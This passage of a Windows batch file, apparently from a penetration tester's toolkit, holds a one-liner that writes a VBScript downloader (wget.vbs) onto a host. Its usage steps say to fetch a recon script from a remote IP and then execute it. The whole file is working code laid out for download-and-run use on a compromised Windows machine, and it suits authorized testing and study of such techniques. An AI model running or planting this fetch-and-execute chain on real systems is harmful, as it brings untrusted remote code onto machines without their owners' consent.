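:: file (e.g. compare a hash with the copy on your own host) before running it.
::
:: Author:
:: Arris Huijgen (@bitsadmin)
::
:: Website:
:: https://github.com/bitsadmin/
::

:: Instructions
:: 1. Execute oneliner below to create the wget.vbs script
:: 2. Download any file using the following commandline: cscript wget.vbs http://1.2.3.4/localrecon.cmd localrecon.cmd
::    (check %ERRORLEVEL%: 0 means the file was written, anything else means the download failed)
:: 3. Execute the downloaded file, i.e.: localrecon.cmd

echo On Error Resume Next >wget.vbs & echo strUrl = WScript.Arguments.Item(0) >>wget.vbs & echo StrFile = WScript.Arguments.Item(1) >>wget.vbs & echo Dim http, stream >>wget.vbs & echo Set http = Nothing >>wget.vbs & echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >>wget.vbs & echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >>wget.vbs & echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >>wget.vbs & echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >>wget.vbs & echo If http Is Nothing Then WScript.Echo "No HTTP object available" : WScript.Quit 2 >>wget.vbs & echo Err.Clear >>wget.vbs & echo http.Open ^"GET^", strUrl, False >>wget.vbs & echo http.Send >>wget.vbs & echo If Err.Number ^<^> 0 Then WScript.Echo "Request failed: " ^& Err.Description : WScript.Quit 1 >>wget.vbs & echo If http.Status ^<^> 200 Then WScript.Echo "HTTP status " ^& http.Status : WScript.Quit 1 >>wget.vbs & echo Set stream = createobject("Adodb.Stream") >>wget.vbs & echo With stream >>wget.vbs & echo .Type = 1 >>wget.vbs & echo .Open >>wget.vbs & echo .Write http.ResponseBody >>wget.vbs & echo .SaveToFile StrFile, 2 >>wget.vbs & echo End With >>wget.vbs & echo If Err.Number ^<^> 0 Then WScript.Echo "Write failed: " ^& Err.Description : WScript.Quit 1 >>wget.vbs
--------------------------------------------------------------------------------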